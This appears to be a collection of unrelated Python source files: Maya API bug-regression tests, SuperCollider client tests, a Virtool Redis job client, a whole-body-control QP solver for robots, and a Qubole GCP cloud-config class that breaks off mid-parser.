self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphereShape1.u[0:1][2:3]'
cmds.select('nurbsSphere1.v[2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphereShape1.u[0:4][0:1]'
cmds.select('nurbsSphere1.uv[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
except AssertionError:
pass
else:
# check that things are BAD!
self.fail("Nurbs surface range domain bug fixed!")
# Bug report 345384
# This bug only seems to affect windows (or at least, Win x64 -
# haven't tried on 32-bit).
class TestMMatrixSetAttr(unittest.TestCase):
def setUp(self):
# pymel essentially fixes this bug by wrapping
# the api's __setattr__... so undo this before testing
if 'pymel.internal.factories' in sys.modules:
factories = sys.modules['pymel.internal.factories']
self.origSetAttr = factories.MetaMayaTypeWrapper._originalApiSetAttrs.get(om.MMatrix, None)
else:
self.origSetAttr = None
if self.origSetAttr:
self.fixedSetAttr = om.MMatrix.__setattr__
om.MMatrix.__setattr__ = self.origSetAttr
cmds.file(new=1, f=1)
def runTest(self):
# We expect it to fail on windows, and pass on other operating systems...
shouldPass = os.name != 'nt'
try:
class MyClass1(object):
def __init__(self):
self._bar = 'not set'
def _setBar(self, val):
print "setting bar to:", val
self._bar = val
def _getBar(self):
print "getting bar..."
return self._bar
bar = property(_getBar, _setBar)
# These two are just so we can trace what's going on...
def __getattribute__(self, name):
# don't just use 'normal' repr, as that will
# call __getattribute__!
print "__getattribute__(%s, %r)" % (object.__repr__(self), name)
return super(MyClass1, self).__getattribute__(name)
def __setattr__(self, name, val):
print "__setattr__(%r, %r, %r)" % (self, name, val)
return super(MyClass1, self).__setattr__(name, val)
foo1 = MyClass1()
# works like we expect...
foo1.bar = 7
print "foo1.bar:", foo1.bar
self.assertTrue(foo1.bar == 7)
class MyClass2(MyClass1, om.MMatrix): pass
foo2 = MyClass2()
foo2.bar = 7
# Here, on windows, MMatrix's __setattr__ takes over, and
# (after presumabably determining it didn't need to do
# whatever special case thing it was designed to do)
# instead of calling the super's __setattr__, which would
# use the property, inserts it into the object's __dict__
# manually
print "foo2.bar:", foo2.bar
self.assertTrue(foo2.bar == 7)
except Exception:
if shouldPass:
raise
else:
if not shouldPass:
self.fail("MMatrix setattr bug seems to have been fixed!")
def tearDown(self):
# Restore the 'fixed' __setattr__'s
if self.origSetAttr:
om.MMatrix.__setattr__ = self.fixedSetAttr
# Introduced in maya 2014
# Change request #: BSPR-12597
if pymel.versions.current() >= pymel.versions.v2014:
class TestShapeParentInstance(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
try:
import maya.cmds as cmds
def getShape(trans):
return cmds.listRelatives(trans, children=True, shapes=True)[0]
cmds.file(new=1, f=1)
shapeTransform = cmds.polyCube(name='singleShapePoly')[0]
origShape = getShape(shapeTransform)
dupeTransform1 = cmds.duplicate(origShape, parentOnly=1)[0]
cmds.parent(origShape, dupeTransform1, shape=True, addObject=True, relative=True)
dupeTransform2 = cmds.duplicate(dupeTransform1)[0]
cmds.delete(dupeTransform1)
dupeShape = getShape(dupeTransform2)
# In maya 2014, this raises:
# Error: Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Source is not connected.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Traceback (most recent call last):
# File "<maya console>", line 13, in <module>
# RuntimeError: Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Source is not connected.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable. #
cmds.parent(dupeShape, shapeTransform, shape=True, addObject=True, relative=True)
except Exception:
pass
else:
self.fail("ShapeParentInstance bug fixed!")
#===============================================================================
# Current bugs that will cause Maya to CRASH (and so are commented out!)
#===============================================================================
# This is commented out as it will cause a CRASH - uncomment out (or just
# copy/ paste the relevant code into the script editor) to test if it's still
# causing a crash...
# If you're copy / pasting into a script editor, in order for a crash to occur,
# all lines must be executed at once - if you execute one at a time, there will
# be no crash
# Also, I'm making the code in each of the test functions self-contained (ie,
# has all imports, etc) for easy copy-paste testing...
#class TestSubdivSelectCrash(unittest.TestCas):
# def testCmds(self):
# import maya.cmds as cmds
# cmds.file(new=1, f=1)
# polyCube = cmds.polyCube()[0]
# subd = cmds.polyToSubdiv(polyCube)[0]
# cmds.select(subd + '.sme[*][*]')
#
# def testApi(self):
# import maya.cmds as cmds
# import maya.OpenMaya as om
#
# polyCube = cmds.polyCube()[0]
# subd = cmds.polyToSubdiv(polyCube)[0]
# selList = om.MSelectionList()
# selList.add(subd + '.sme[*][*]')
#===============================================================================
# FIXED (Former) Bugs
#===============================================================================
# Fixed in Maya 2009! yay!
class TestConstraintVectorQuery(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def _doTestForConstraintType(self, constraintType):
cmd = getattr(cmds, constraintType)
if constraintType == 'tangentConstraint':
target = cmds.circle()[0]
else:
target = cmds.polyCube()[0]
constrained = cmds.polyCube()[0]
constr = cmd(target, constrained)[0]
self.assertEqual(cmd(constr, q=1, worldUpVector=1), [0,1,0])
self.assertEqual(cmd(constr, q=1, upVector=1), [0,1,0])
self.assertEqual(cmd(constr, q=1, aimVector=1), [1,0,0])
def test_aimConstraint(self):
self._doTestForConstraintType('aimConstraint')
def test_normalConstraint(self):
self._doTestForConstraintType('normalConstraint')
def test_tangentConstraint(self):
self._doTestForConstraintType('tangentConstraint')
# Fixed ! Yay! (...though I've only check on win64...)
# (not sure when... was fixed by time of 2011 Hotfix 1 - api 201101,
# and still broken in 2009 SP1a - api 200906)
class TestMatrixSetAttr(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
res = cmds.sphere(n='node')
cmds.addAttr(ln='matrixAttr',dt="matrix")
def runTest(self):
cmds.setAttr( 'node.matrixAttr', 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, type='matrix' )
# Bug report 345382
# Fixed ! Yay! (...though I've only check on win64...)
# (not sure when... was fixed by time of 2011 Hotfix 1 - api 201101,
# and still broken in 2009 SP1a - api 200906)
class TestFluidMFnCreation(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
fluid = cmds.createNode('fluidShape')
selList = om.MSelectionList()
selList.add(fluid)
dag = om.MDagPath()
selList.getDagPath(0, dag)
omfx.MFnFluid(dag)
# nucleus node fixed in 2014
# symmetryConstraint fixed in 2015
class TestMFnCompatibility(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def _assertInheritMFnConistency(self, nodeType, parentNodeType, mfnType):
nodeInstName = cmds.createNode(nodeType)
selList = om.MSelectionList()
selList.add(nodeInstName)
mobj = om.MObject()
selList.getDependNode(0, mobj)
self.assertTrue(parentNodeType in cmds.nodeType(nodeInstName, inherited=True))
try:
mfnType(mobj)
except Exception, e:
raise self.fail("Error creating %s even though %s inherits from %s: %s" %
(mfnType.__name__, nodeType, parentNodeType, e))
def test_nucleus_MFnDagNode(self):
self._assertInheritMFnConistency('nucleus', 'dagNode', om.MFnDagNode)
def test_nucleus_MFnTransform(self):
self._assertInheritMFnConistency('nucleus', 'transform', om.MFnTransform)
def test_symmetryConstraint_test_nucleus_MFnDagNode(self):
self._assertInheritMFnConistency('symmetryConstraint', 'dagNode', om.MFnDagNode)
def test_symmetryConstraint_MFnTransform(self):
self._assertInheritMFnConistency('symmetryConstraint', 'transform',
om.MFnTransform)
# These probably aren't strictly considered "bugs" by autodesk, though I
# think they should be...
# def test_hikHandle_MFnIkHandle(self):
# self._assertInheritMFnConistency('hikHandle', 'ikHandle', oma.MFnIkHandle)
#
# def test_jointFfd_MFnLatticeDeformer(self):
# self._assertInheritMFnConistency('jointFfd', 'ffd', oma.MFnLatticeDeformer)
#
# def test_transferAttributes_MFnWeightGeometryFilter(self):
# self._assertInheritMFnConistency('transferAttributes', 'weightGeometryFilter', oma.MFnWeightGeometryFilter)
#
# def test_transferAttributes_MFnGeometryFilter(self):
# self._assertInheritMFnConistency('transferAttributes', 'geometryFilter', oma.MFnGeometryFilter)
# Fixed in 2014! yay!
class TestGroupUniqueness(unittest.TestCase):
'''Test to check whether cmds.group returns a unique name
'''
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
cmds.select(cl=1)
cmds.group(n='foo', empty=1)
cmds.group(n='bar')
cmds.select(cl=1)
res = cmds.group(n='foo', empty=1)
sameNames = cmds.ls(res)
if len(sameNames) < 1:
self.fail('cmds.group did not return a valid name')
elif len(sameNames) > 1:
self.fail('cmds.group did not return a unique name')
|
105802
|
import pytest
import supercollider
from tests.shared import server
def test_synth_create(server):
synth = supercollider.Synth(server, "sine", { "freq": 440.0, "gain": -24 })
assert synth.id > 0
synth.free()
def test_synth_get_set(server):
synth = supercollider.Synth(server, "sine", { "freq": 440.0, "gain": -24 })
assert synth.get("freq") == 440.0
synth.set("freq", 880.0)
assert synth.get("freq") == 880.0
synth.free()
def test_synth_actions(server):
group = supercollider.Group(server)
synth0 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group)
tree = server.query_tree(group)
assert tree[2] == 1
assert tree[3] == synth0.id
synth1 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group, action=supercollider.ADD_TO_HEAD)
tree = server.query_tree(group)
assert tree[2] == 2
assert tree[3] == synth1.id
synth2 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group, action=supercollider.ADD_TO_TAIL)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 3
assert tree[3] == synth1.id
assert tree[9] == synth2.id
synth3 = supercollider.Synth(server, "sine", { "gain": -96 }, target=synth1, action=supercollider.ADD_AFTER)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 4
assert tree[3] == synth3.id
synth4 = supercollider.Synth(server, "sine", { "gain": -96 }, target=synth1, action=supercollider.ADD_BEFORE)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 5
assert tree[9] == synth4.id
group.free()
|
105826
|
import logging
from asyncio import gather
from virtool.db.utils import get_one_field
from virtool.jobs.db import PROJECTION, cancel
logger = logging.getLogger(__name__)
WORKFLOW_NAMES = (
"jobs_build_index",
"jobs_create_sample",
"jobs_create_subtraction",
"jobs_aodp",
"jobs_nuvs",
"jobs_pathoscope_bowtie",
)
class JobsClient:
def __init__(self, app):
self.db = app["db"]
self.redis = app["redis"]
async def enqueue(self, job_id):
workflow = await get_one_field(self.db.jobs, "workflow", job_id)
await self.redis.rpush(f"jobs_{workflow}", job_id)
logger.debug(f"Enqueued job: {job_id}")
async def cancel(self, job_id: str) -> dict:
"""
Cancel the job with the given `job_id`.
If the job is still waiting, its ID will be in a Redis list. Remove the ID from the list and append a cancelled
status records the job document's status field.
If the job is running, set its state to `cancelling` and publish its ID to the cancellation Redis PubSub
channel. Listening runners will see the ID and cancel their jobs if their current job ID matches.
:param job_id: the ID of the job to cancel
:return: the updated job document
"""
lrem_calls = [
self.redis.lrem(workflow_name, 0, job_id)
for workflow_name in WORKFLOW_NAMES
]
counts = await gather(*lrem_calls)
if any(counts):
logger.debug(f"Removed job from Redis job queue: {job_id}")
return await cancel(self.db, job_id)
document = await self.db.jobs.find_one_and_update(
{"_id": job_id}, {"$set": {"state": "cancelling"}}, projection=PROJECTION
)
await self.redis.publish("channel:cancel", job_id)
logger.debug(f"Requested job cancellation via Redis: {job_id}")
return document
|
105872
|
import sys
import numpy as np
np.set_printoptions(precision=2, threshold=sys.maxsize)
from scipy.linalg import block_diag
from qpsolvers import solve_qp
from util import util
from pnc.data_saver import DataSaver
class IHWBC(object):
"""
Implicit Hierarchy Whole Body Control
------------------
Usage:
update_setting --> solve
"""
def __init__(self, sf, sa, sv, data_save=False):
self._n_q_dot = sa.shape[1]
self._n_active = sa.shape[0]
self._n_passive = sv.shape[0]
self._sf = sf
self._snf = np.concatenate(
(np.zeros((self._n_active + self._n_passive, 6)),
np.eye(self._n_active + self._n_passive)),
axis=1)
self._sa = sa
self._sv = sv
self._trq_limit = None
self._lambda_q_ddot = 0.
self._lambda_rf = 0.
self._w_rf = 0.
self._w_hierarchy = 0.
self._b_data_save = data_save
if self._b_data_save:
self._data_saver = DataSaver()
@property
def trq_limit(self):
return self._trq_limit
@property
def lambda_q_ddot(self):
return self._lambda_q_ddot
@property
def lambda_rf(self):
return self._lambda_rf
@property
def w_hierarchy(self):
return self._w_hierarchy
@property
def w_rf(self):
return self._w_rf
@trq_limit.setter
def trq_limit(self, val):
assert val.shape[0] == self._n_active
self._trq_limit = np.copy(val)
@lambda_q_ddot.setter
def lambda_q_ddot(self, val):
self._lambda_q_ddot = val
@lambda_rf.setter
def lambda_rf(self, val):
self._lambda_rf = val
@w_hierarchy.setter
def w_hierarchy(self, val):
self._w_hierarchy = val
@w_hierarchy.setter
def w_rf(self, val):
self._w_rf = val
def update_setting(self, mass_matrix, mass_matrix_inv, coriolis, gravity):
self._mass_matrix = np.copy(mass_matrix)
self._mass_matrix_inv = np.copy(mass_matrix_inv)
self._coriolis = np.copy(coriolis)
self._gravity = np.copy(gravity)
def solve(self,
task_list,
contact_list,
internal_constraint_list,
rf_des=None,
verbose=False):
"""
Parameters
----------
task_list (list of Task):
Task list
contact_list (list of Contact):
Contact list
internal_constraint_list (list of InternalConstraint):
Internal constraint list
rf_des (np.ndarray):
Reaction force desired
verbose (bool):
Printing option
Returns
-------
joint_trq_cmd (np.array):
Joint trq cmd
joint_acc_cmd (np.array):
Joint acc cmd
sol_rf (np.array):
Reaction force
"""
# ======================================================================
# Internal Constraint
# Set ni, jit_lmd_jidot_qdot, sa_ni_trc_bar_tr, and b_internal_constraint
# ======================================================================
if len(internal_constraint_list) > 0:
ji = np.concatenate(
[ic.jacobian for ic in internal_constraint_list], axis=0)
jidot_qdot = np.concatenate(
[ic.jacobian_dot_q_dot for ic in internal_constraint_list],
axis=0)
lmd = np.linalg.pinv(
np.dot(np.dot(ji, self._mass_matrix_inv), ji.transpose()))
ji_bar = np.dot(np.dot(self._mass_matrix_inv, ji.transpose()), lmd)
ni = np.eye(self._n_q_dot) - np.dot(ji_bar, ji)
jit_lmd_jidot_qdot = np.squeeze(
np.dot(np.dot(ji.transpose(), lmd), jidot_qdot))
sa_ni_trc = np.dot(self._sa, ni)[:, 6:]
sa_ni_trc_bar = util.weighted_pinv(sa_ni_trc,
self._mass_matrix_inv[6:, 6:])
sa_ni_trc_bar_tr = sa_ni_trc_bar.transpose()
b_internal_constraint = True
else:
ni = np.eye(self._n_q_dot)
jit_lmd_jidot_qdot = np.zeros(self._n_q_dot)
sa_ni_trc_bar = np.eye(self._n_active)
sa_ni_trc_bar_tr = sa_ni_trc_bar.transpose()
b_internal_constraint = False
# print("ni")
# print(ni)
# print("jit_lmd_jidot_qdot")
# print(jit_lmd_jidot_qdot)
# print("sa_ni_trc_bar_tr")
# print(sa_ni_trc_bar_tr)
# exit()
# ======================================================================
# Cost
# ======================================================================
cost_t_mat = np.zeros((self._n_q_dot, self._n_q_dot))
cost_t_vec = np.zeros(self._n_q_dot)
for i, task in enumerate(task_list):
j = task.jacobian
j_dot_q_dot = task.jacobian_dot_q_dot
x_ddot = task.op_cmd
if verbose:
print("====================")
print(task.target_id, " task")
task.debug()
cost_t_mat += self._w_hierarchy[i] * np.dot(j.transpose(), j)
cost_t_vec += self._w_hierarchy[i] * np.dot(
(j_dot_q_dot - x_ddot).transpose(), j)
# cost_t_mat += self._lambda_q_ddot * np.eye(self._n_q_dot)
cost_t_mat += self._lambda_q_ddot * self._mass_matrix
if contact_list is not None:
uf_mat = np.array(
block_diag(
*[contact.cone_constraint_mat
for contact in contact_list]))
uf_vec = np.concatenate(
[contact.cone_constraint_vec for contact in contact_list])
contact_jacobian = np.concatenate(
[contact.jacobian for contact in contact_list], axis=0)
assert uf_mat.shape[0] == uf_vec.shape[0]
assert uf_mat.shape[1] == contact_jacobian.shape[0]
dim_cone_constraint, dim_contacts = uf_mat.shape
cost_rf_mat = (self._lambda_rf + self._w_rf) * np.eye(dim_contacts)
if rf_des is None:
rf_des = np.zeros(dim_contacts)
cost_rf_vec = -self._w_rf * np.copy(rf_des)
cost_mat = np.array(block_diag(
cost_t_mat, cost_rf_mat)) # (nqdot+nc, nqdot+nc)
cost_vec = np.concatenate([cost_t_vec, cost_rf_vec]) # (nqdot+nc,)
else:
dim_contacts = dim_cone_constraint = 0
cost_mat = np.copy(cost_t_mat)
cost_vec = np.copy(cost_t_vec)
# if verbose:
# print("==================================")
# np.set_printoptions(precision=4)
# print("cost_t_mat")
# print(cost_t_mat)
# print("cost_t_vec")
# print(cost_t_vec)
# print("cost_rf_mat")
# print(cost_rf_mat)
# print("cost_rf_vec")
# print(cost_rf_vec)
# print("cost_mat")
# print(cost_mat)
# print("cost_vec")
# print(cost_vec)
# ======================================================================
# Equality Constraint
# ======================================================================
if contact_list is not None:
eq_floating_mat = np.concatenate(
(np.dot(self._sf, self._mass_matrix),
-np.dot(self._sf,
np.dot(contact_jacobian, ni).transpose())),
axis=1) # (6, nqdot+nc)
if b_internal_constraint:
eq_int_mat = np.concatenate(
(ji, np.zeros((ji.shape[0], dim_contacts))),
axis=1) # (2, nqdot+nc)
eq_int_vec = np.zeros(ji.shape[0])
else:
eq_floating_mat = np.dot(self._sf, self._mass_matrix)
if b_internal_constraint:
eq_int_mat = np.copy(ji)
eq_int_vec = np.zeros(ji.shape[0])
eq_floating_vec = -np.dot(self._sf,
np.dot(ni.transpose(),
(self._coriolis + self._gravity)))
if b_internal_constraint:
eq_mat = np.concatenate((eq_floating_mat, eq_int_mat), axis=0)
eq_vec = np.concatenate((eq_floating_vec, eq_int_vec), axis=0)
else:
eq_mat = np.copy(eq_floating_mat)
eq_vec = np.copy(eq_floating_vec)
# ======================================================================
# Inequality Constraint
# ======================================================================
if self._trq_limit is None:
if contact_list is not None:
ineq_mat = np.concatenate(
(np.zeros((dim_cone_constraint, self._n_q_dot)), -uf_mat),
axis=1)
ineq_vec = -uf_vec
else:
ineq_mat = None
ineq_vec = None
else:
if contact_list is not None:
ineq_mat = np.concatenate(
(np.concatenate(
(np.zeros((dim_cone_constraint, self._n_q_dot)),
-np.dot(sa_ni_trc_bar_tr,
np.dot(self._snf, self._mass_matrix)),
np.dot(sa_ni_trc_bar_tr,
np.dot(self._snf, self._mass_matrix))),
axis=0),
np.concatenate(
(-uf_mat,
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(contact_jacobian, ni).transpose()),
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(contact_jacobian, ni).transpose())),
axis=0)),
axis=1)
ineq_vec = np.concatenate((
-uf_vec,
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) + np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) - self._trq_limit[:, 0],
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) - np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) +
self._trq_limit[:, 1]))
else:
ineq_mat = np.concatenate(
(-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
self._mass_matrix),
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
self._mass_matrix)),
axis=0)
ineq_vec = np.concatenate(
(np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) + np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) - self._trq_limit[:, 0],
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) - np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) +
self._trq_limit[:, 1]))
# if verbose:
# print("eq_mat")
# print(eq_mat)
# print("eq_vec")
# print(eq_vec)
# print("ineq_mat")
# print(ineq_mat)
# print("ineq_vec")
# print(ineq_vec)
sol = solve_qp(
cost_mat,
cost_vec,
ineq_mat,
ineq_vec,
eq_mat,
eq_vec,
solver="quadprog",
verbose=True)
if contact_list is not None:
sol_q_ddot, sol_rf = sol[:self._n_q_dot], sol[self._n_q_dot:]
else:
sol_q_ddot, sol_rf = sol, None
if contact_list is not None:
joint_trq_cmd = np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(self._mass_matrix, sol_q_ddot) +
np.dot(ni.transpose(), (self._coriolis + self._gravity)) -
np.dot(np.dot(contact_jacobian, ni).transpose(), sol_rf))
else:
joint_trq_cmd = np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(self._mass_matrix, sol_q_ddot) +
np.dot(ni, (self._coriolis + self._gravity)))
joint_acc_cmd = np.dot(self._sa, sol_q_ddot)
if verbose:
print("joint_trq_cmd: ", joint_trq_cmd)
print("sol_q_ddot: ", sol_q_ddot)
print("sol_rf: ", sol_rf)
for i, task in enumerate(task_list):
j = task.jacobian
j_dot_q_dot = task.jacobian_dot_q_dot
x_ddot = task.op_cmd
print(task.target_id, " task")
print("des x ddot: ", x_ddot)
print("j*qddot_sol + Jdot*qdot: ",
np.dot(j, sol_q_ddot) + j_dot_q_dot)
if self._b_data_save:
self._data_saver.add('joint_trq_cmd', joint_trq_cmd)
self._data_saver.add('joint_acc_cmd', joint_acc_cmd)
self._data_saver.add('rf_cmd', sol_rf)
return joint_trq_cmd, joint_acc_cmd, sol_rf
|
105876
|
from qds_sdk.cloud.cloud import Cloud
class GcpCloud(Cloud):
'''
qds_sdk.cloud.GcpCloud is the class which stores information about gcp cloud config settings.
The objects of this class can be use to set gcp cloud_config settings while create/update/clone a cluster.
'''
def __init__(self):
self.compute_config = {}
self.location = {}
self.network_config = {}
self.storage_config = {}
self.cluster_composition = {}
def set_cloud_config(self,
qsa_client_id=None,
customer_project_id=None,
qsa_client_email=None,
qsa_private_key_id=None,
qsa_private_key=None,
comp_client_email=None,
inst_client_email=None,
use_account_compute_creds=None,
gcp_region=None,
gcp_zone=None,
storage_disk_size_in_gb=None,
storage_disk_count=None,
storage_disk_type=None,
bastion_node_public_dns=None,
vpc_id=None,
subnet_id=None,
master_preemptible=None,
min_nodes_preemptible=None,
min_nodes_preemptible_percentage=None,
autoscaling_nodes_preemptible=None,
autoscaling_nodes_preemptible_percentage=None):
'''
Args:
qsa_client_id: Compute client id for gcp cluster
customer_project_id: Compute project id for gcp cluster
qsa_client_email: Compute client email for gcp cluster
qsa_private_key_id: Compute private key id for gcp cluster
qsa_private_key: Compute private key for gcp cluster
comp_client_email: Client compute service account email
inst_client_email: Client storage/instance service account email
use_account_compute_creds: Set it to true to use the account's compute
credentials for all clusters of the account.The default value is false
gcp_region: Region for gcp cluster
bastion_node_public_dns: public dns name of the bastion node.
Required only if cluster is in a private subnet.
vpc_id: Vpc id for gcp cluster
subnet_id: Subnet id for gcp cluster
master_preemptible: if the master node is preemptible
min_nodes_preemptible: if the min nodes are preemptible
min_nodes_preemptible_percentage: percentage of min nodes that are preemptible
autoscaling_nodes_preemptible: if the autoscaling nodes are preemptible
autoscaling_nodes_preemptible_percentage: percentage of autoscaling nodes that are preemptible
'''
self.set_compute_config(use_account_compute_creds, qsa_client_id, customer_project_id, qsa_client_email,
qsa_private_key_id, qsa_private_key, comp_client_email)
self.set_location(gcp_region, gcp_zone)
self.set_network_config(bastion_node_public_dns, vpc_id, subnet_id)
self.set_storage_config(inst_client_email, storage_disk_size_in_gb, storage_disk_count, storage_disk_type)
self.set_cluster_composition(master_preemptible, min_nodes_preemptible, min_nodes_preemptible_percentage,
autoscaling_nodes_preemptible, autoscaling_nodes_preemptible_percentage)
def set_compute_config(self,
use_account_compute_creds=None,
qsa_client_id=None,
customer_project_id=None,
qsa_client_email=None,
qsa_private_key_id=None,
qsa_private_key=None,
comp_client_email=None):
self.compute_config['use_account_compute_creds'] = use_account_compute_creds
self.compute_config['qsa_client_id'] = qsa_client_id
self.compute_config['customer_project_id'] = customer_project_id
self.compute_config['qsa_client_email'] = qsa_client_email
self.compute_config['qsa_private_key_id'] = qsa_private_key_id
self.compute_config['qsa_private_key'] = qsa_private_key
self.compute_config['comp_client_email'] = comp_client_email
def set_location(self,
gcp_region=None,
gcp_zone=None,
):
self.location['region'] = gcp_region
self.location['zone'] = gcp_zone
def set_network_config(self,
bastion_node_public_dns=None,
vpc_id=None,
subnet_id=None):
self.network_config['bastion_node_public_dns'] = bastion_node_public_dns
self.network_config['network'] = vpc_id
self.network_config['subnet'] = subnet_id
def set_storage_config(self,
inst_client_email=None,
storage_disk_size_in_gb=None,
storage_disk_count=None,
storage_disk_type=None
):
self.storage_config['inst_client_email'] = inst_client_email
self.storage_config['disk_size_in_gb'] = storage_disk_size_in_gb
self.storage_config['disk_count'] = storage_disk_count
self.storage_config['disk_type'] = storage_disk_type
def set_cluster_composition(self,
master_preemptible=None,
min_nodes_preemptible=None,
min_nodes_preemptible_percentage=None,
autoscaling_nodes_preemptible=None,
autoscaling_nodes_preemptible_percentage=None):
self.cluster_composition['master'] = {}
self.cluster_composition['master']['preemptible'] = master_preemptible
self.cluster_composition['min_nodes'] = {}
self.cluster_composition['min_nodes']['preemptible'] = min_nodes_preemptible
self.cluster_composition['min_nodes']['percentage'] = min_nodes_preemptible_percentage
self.cluster_composition['autoscaling_nodes'] = {}
self.cluster_composition['autoscaling_nodes']['preemptible'] = autoscaling_nodes_preemptible
self.cluster_composition['autoscaling_nodes']['percentage'] = autoscaling_nodes_preemptible_percentage
def set_cloud_config_from_arguments(self, arguments):
self.set_cloud_config(qsa_client_id=arguments.qsa_client_id,
customer_project_id=arguments.customer_project_id,
qsa_client_email=arguments.qsa_client_email,
qsa_private_key_id=arguments.qsa_private_key_id,
qsa_private_key=arguments.qsa_private_key,
inst_client_email=arguments.inst_client_email,
comp_client_email=arguments.comp_client_email,
use_account_compute_creds=arguments.use_account_compute_creds,
gcp_region=arguments.gcp_region,
gcp_zone=arguments.gcp_zone,
storage_disk_size_in_gb=arguments.storage_disk_size_in_gb,
storage_disk_count=arguments.storage_disk_count,
storage_disk_type=arguments.storage_disk_type,
bastion_node_public_dns=arguments.bastion_node_public_dns,
vpc_id=arguments.vpc_id,
subnet_id=arguments.subnet_id,
master_preemptible=arguments.master_preemptible,
min_nodes_preemptible=arguments.min_nodes_preemptible,
min_nodes_preemptible_percentage=arguments.min_nodes_preemptible_percentage,
autoscaling_nodes_preemptible=arguments.autoscaling_nodes_preemptible,
autoscaling_nodes_preemptible_percentage=arguments.autoscaling_nodes_preemptible_percentage)
def create_parser(self, argparser):
# compute settings parser
compute_config = argparser.add_argument_group("compute config settings")
compute_creds = compute_config.add_mutually_exclusive_group()
compute_creds.add_argument("--enable-account-compute-creds",
dest="use_account_compute_creds",
action="store_true",
default=None,
help="to use account compute credentials")
compute_creds.add_argument("--disable-account-compute-creds",
dest="use_account_compute_creds",
action="store_false",
default=None,
help="to disable account compute credentials")
compute_config.add_argument("--qsa-client-id",
dest="qsa_client_id",
default=None,
help="qsa client id for gcp cluster")
compute_config.add_argument("--customer-project-id",
dest="customer_project_id",
default=None,
help="customer project id for gcp cluster")
compute_config.add_argument("--qsa-client-email",
dest="qsa_client_email",
default=None,
help="qsa client email for gcp cluster")
compute_config.add_argument("--qsa-private-key-id",
dest="qsa_private_key_id",
default=None,
help="qsa private key id for gcp cluster")
compute_config.add_argument("--qsa-private-key",
dest="qsa_private_key",
default=None,
help="qsa private key for gcp cluster")
compute_config.add_argument("--compute-client-email",
dest="comp_client_email",
default=None,
help="client compute service account email")
# location settings parser
location_group = argparser.add_argument_group("location config settings")
location_group.add_argument("--gcp-region",
dest="gcp_region",
help="region to create the cluster in")
location_group.add_argument("--gcp-zone",
dest="gcp_zone",
help="zone to create the cluster in")
# network settings parser
network_config_group = argparser.add_argument_group("network config settings")
network_config_group.add_argument("--bastion-node-public-dns",
dest="bastion_node_public_dns",
help="public dns name of the bastion node. Required only if cluster is in private subnet")
network_config_group.add_argument("--vpc-id",
dest="vpc_id",
help="vpc id to create the cluster in")
network_config_group.add_argument("--subnet-id",
dest="subnet_id",
help="subnet id to create the cluster in")
# storage config settings parser
storage_config = argparser.add_argument_group("storage config settings")
storage_config.add_argument("--storage-client-email",
dest="inst_client_email",
default=None,
help="client storage service account email")
storage_config.add_argument("--storage-disk-size-in-gb",
dest="storage_disk_size_in_gb",
default=None,
help="disk size in gb for gcp cluster")
storage_config.add_argument("--storage-disk-count",
dest="storage_disk_count",
default=None,
help="disk count for gcp cluster")
storage_config.add_argument("--storage-disk-type",
dest="storage_disk_type",
default=None,
help="disk type for gcp cluster")
# cluster composition settings parser
cluster_composition = argparser.add_argument_group("cluster composition settings")
cluster_composition.add_argument("--master-preemptible",
dest="master_preemptible",
action="store_true",
default=None,
help="if the master node is preemptible")
cluster_composition.add_argument("--min-nodes-preemptible",
dest="min_nodes_preemptible",
action="store_true",
default=None,
help="if the min nodes are preemptible")
cluster_composition.add_argument("--min-nodes-preemptible-percentage",
dest="min_nodes_preemptible_percentage",
type=int,
default=None,
help="percentage of min nodes that are preemptible")
